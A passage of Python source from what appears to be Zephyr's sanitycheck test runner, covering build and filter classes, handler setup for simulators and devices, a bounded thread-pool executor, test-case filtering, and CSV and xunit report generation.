with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-sanitycheck.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
dts_path = os.path.join(self.build_dir, "zephyr", self.platform.name + ".dts.pre.tmp")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(dts_path):
edt = edtlib.EDT(dts_path, [os.path.join(ZEPHYR_BASE, "dts", "bindings")],
warn_reg_unit_address_mismatch=False)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
def process(self, message):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
results = self.cmake()
if self.instance.status == "failed":
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in results['filter'] and results['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
results = self.build()
if not results:
self.instance.status = "failed"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
if results.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
pipeline.put({
"op": "report",
"test": self.instance,
"state": "executed",
"status": self.instance.status,
"reason": self.instance.reason}
)
# Report results and output progress to screen
elif op == "report":
with report_lock:
self.report_out()
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
self.cleanup_artifacts()
def cleanup_artifacts(self):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
whitelist = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
whitelist = [os.path.join(self.instance.build_dir, file) for file in whitelist]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in whitelist:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def report_out(self):
total_tests_width = len(str(self.suite.total_tests))
self.suite.total_done += 1
instance = self.instance
if instance.status in ["failed", "timeout"]:
self.suite.total_failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
self.suite.total_skipped += 1
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
else:
status = Fore.GREEN + "PASSED" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
self.suite.total_done, total_tests_width, self.suite.total_tests, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
self.suite.total_done,
self.suite.total_tests,
Fore.RESET,
int((float(self.suite.total_done) / self.suite.total_tests) * 100),
Fore.YELLOW if self.suite.total_skipped > 0 else Fore.RESET,
self.suite.total_skipped,
Fore.RESET,
Fore.RED if self.suite.total_failed > 0 else Fore.RESET,
self.suite.total_failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if (self.testcase.extra_configs or self.coverage or
self.asan):
overlays.append(os.path.join(instance.build_dir,
"sanitycheck", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
results = self.run_cmake(args)
return results
def build(self):
results = self.run_build(['--build', self.build_dir])
return results
def run(self):
instance = self.instance
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class BoundedExecutor(concurrent.futures.ThreadPoolExecutor):
"""BoundedExecutor behaves as a ThreadPoolExecutor which will block on
calls to submit() once the limit given as "bound" work items are queued for
execution.
:param bound: Integer - the maximum number of items in the work queue
:param max_workers: Integer - the size of the thread pool
"""
def __init__(self, bound, max_workers, **kwargs):
super().__init__(max_workers)
# self.executor = ThreadPoolExecutor(max_workers=max_workers)
self.semaphore = BoundedSemaphore(bound + max_workers)
def submit(self, fn, *args, **kwargs):
self.semaphore.acquire()
try:
future = super().submit(fn, *args, **kwargs)
except Exception:
self.semaphore.release()
raise
else:
future.add_done_callback(lambda x: self.semaphore.release())
return future
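# Illustrative use of BoundedExecutor (a sketch; the worker function is made
# up):
#
#   def work(n):
#       return n * n
#
#   with BoundedExecutor(bound=10, max_workers=4) as executor:
#       futures = [executor.submit(work, i) for i in range(100)]
#
# submit() blocks once bound + max_workers items are outstanding, which keeps
# the internal work queue from growing without limit.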
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "testcase-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_whitelist": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_whitelist": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_whitelist": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk",
"sanity_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
        self.enable_size_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.platforms = []
self.selected_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_tests = 0 # number of test instances
self.total_cases = 0 # number of test cases
self.total_done = 0 # tests completed
self.total_failed = 0
self.total_skipped = 0
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
self.cv = threading.Condition()
# hardcoded for now
self.connected_hardware = []
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + "/")}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update(self):
self.total_tests = len(self.instances)
self.total_cases = len(self.testcases)
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.info("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def misc_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage <
(footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics['handler_time']:
run += 1
if self.total_tests and self.total_tests != self.total_skipped:
pass_rate = (float(self.total_tests - self.total_failed - self.total_skipped) / float(
self.total_tests - self.total_skipped))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} tests passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
self.total_tests - self.total_failed - self.total_skipped,
self.total_tests - self.total_skipped,
Fore.RESET,
pass_rate,
Fore.RED if self.total_failed else Fore.RESET,
self.total_failed,
Fore.RESET,
self.total_skipped,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
if self.platforms:
logger.info("In total {} test cases were executed on {} out of total {} platforms ({:02.2f}%)".format(
self.total_cases,
len(self.selected_platforms),
self.total_platforms,
(100 * len(self.selected_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} tests executed on platforms, \
{Fore.RED}{self.total_tests - run}{Fore.RESET} tests were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed):
if not self.instances:
return
if name:
report_name = name
else:
report_name = "sanitycheck"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False, append=only_failed)
self.xunit_report(filename + "_report.xml", full_report=True, append=only_failed)
self.csv_report(filename + ".csv")
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
logger.debug("Found platform configuration " + file)
try:
platform = Platform()
platform.load(file)
if platform.sanitycheck:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain = os.environ.get("ZEPHYR_TOOLCHAIN_VARIANT", None) or \
os.environ.get("ZEPHYR_GCC_VARIANT", None)
if toolchain == "gccarmemb":
# Remove this translation when gccarmemb is no longer supported.
toolchain = "gnuarmemb"
try:
if not toolchain:
raise SanityRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, dirnames, filenames in os.walk(root, topdown=True):
logger.debug("scanning %s" % dirpath)
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
dirnames[:] = []
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = SanityConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_whitelist = tc_dict["arch_whitelist"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_whitelist = tc_dict["platform_whitelist"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_whitelist = tc_dict["toolchain_whitelist"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_from_file(self, file, filter_status=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
instance = TestInstance(self.testcases[test], platform, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
device_testing_filter = kwargs.get('device_testing')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
else:
platforms = self.platforms
if all_filter:
logger.info("Selecting all possible platforms per test case")
            # When --all is used, any --platform arguments are ignored
platform_filter = []
elif not platform_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platforms:
instance = TestInstance(tc, plat, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixtures
)
if device_testing_filter:
for h in self.connected_hardware:
if h['platform'] == plat.name:
if tc.harness_config.get('fixture') in h.get('fixtures', []):
instance.build_only = False
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = "Platform is excluded on command line."
continue
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if device_testing_filter and instance.build_only:
discards[instance] = "Not runnable on device"
continue
if tc.skip:
discards[instance] = "Skip filter"
continue
if tc.build_on_all and not platform_filter:
platform_filter = []
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = "Command line testcase tag filter"
continue
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = "Command line testcase exclude filter"
continue
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = "Testcase name filter"
continue
if arch_filter and plat.arch not in arch_filter:
discards[instance] = "Command line testcase arch filter"
continue
if not force_platform:
if tc.arch_whitelist and plat.arch not in tc.arch_whitelist:
discards[instance] = "Not in test case arch whitelist"
continue
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = "In test case arch exclude"
continue
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = "In test case platform exclude"
continue
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = "In test case toolchain exclude"
continue
if platform_filter and plat.name not in platform_filter:
discards[instance] = "Command line platform filter"
continue
if tc.platform_whitelist and plat.name not in tc.platform_whitelist:
discards[instance] = "Not in testcase platform whitelist"
continue
if tc.toolchain_whitelist and toolchain not in tc.toolchain_whitelist:
discards[instance] = "Not in testcase toolchain whitelist"
continue
if not plat.env_satisfied:
discards[instance] = "Environment ({}) not satisfied".format(", ".join(plat.env))
continue
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and tc.type != 'unit':
discards[instance] = "Not supported by the toolchain"
continue
if plat.ram < tc.min_ram:
discards[instance] = "Not enough RAM"
continue
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = "No hardware support"
continue
if plat.flash < tc.min_flash:
discards[instance] = "Not enough FLASH"
continue
if set(plat.ignore_tags) & tc.tags:
discards[instance] = "Excluded tags per platform"
continue
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if sanitycheck was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all:
if tc.platform_whitelist:
a = set(self.default_platforms)
b = set(tc.platform_whitelist)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list[:1])
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
for instance in list(filter(lambda inst: not inst.platform.default, instance_list)):
discards[instance] = "Not a default test platform"
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, test_only=False):
for instance in self.instances.values():
if test_only:
if instance.run:
pipeline.put({"op": "run", "test": instance, "status": "built"})
else:
if instance.status not in ['passed', 'skipped']:
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
return "DONE FEEDING"
def execute(self):
def calc_one_elf_size(instance):
if instance.status not in ["failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
logger.info("Adding tasks to the queue...")
# We can use a with statement to ensure threads are cleaned up promptly
with BoundedExecutor(bound=self.jobs, max_workers=self.jobs) as executor:
# start a future for a thread which sends work in through the queue
future_to_test = {
executor.submit(self.add_tasks_to_queue, self.test_only): 'FEEDER DONE'}
while future_to_test:
# check for status of the futures which are currently working
done, pending = concurrent.futures.wait(future_to_test, timeout=1,
return_when=concurrent.futures.FIRST_COMPLETED)
# if there is incoming work, start a new future
while not pipeline.empty():
# fetch a url from the queue
message = pipeline.get()
test = message['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose
)
future_to_test[executor.submit(pb.process, message)] = test.name
# process any completed futures
for future in done:
test = future_to_test[future]
try:
data = future.result()
except Exception as exc:
logger.error('%r generated an exception: %s' % (test, exc))
sys.exit('%r generated an exception: %s' % (test, exc))
else:
if data:
logger.debug(data)
# remove the now completed future
del future_to_test[future]
for future in pending:
test = future_to_test[future]
try:
future.result(timeout=180)
except concurrent.futures.TimeoutError:
logger.warning("{} stuck?".format(test))
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
def discard_report(self, filename):
try:
if self.discards is None:
raise SanityRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True, append=append)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False):
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in self.instances.items():
if platform and instance.platform.name != platform:
continue
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP':
skips += 1
else:
fails += 1
else:
if instance.status in ["failed", "timeout"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
else:
passes += 1
run = "Sanitycheck"
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
eleTestsuite = tree.findall('testsuite')[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skip'] = "%d" % skips
else:
eleTestsuites = ET.Element('testsuites')
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (errors + passes + fails + skips),
failures="%d" % fails,
errors="%d" % (errors), skip="%s" % (skips))
for _, instance in self.instances.items():
if platform and instance.platform.name != platform:
continue
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.name
            # remove testcases that are being re-run from existing reports
if append:
for tc in eleTestsuite.findall('testcase'):
if tc.get('classname') == "%s:%s" % (instance.platform.name, tname):
eleTestsuite.remove(tc)
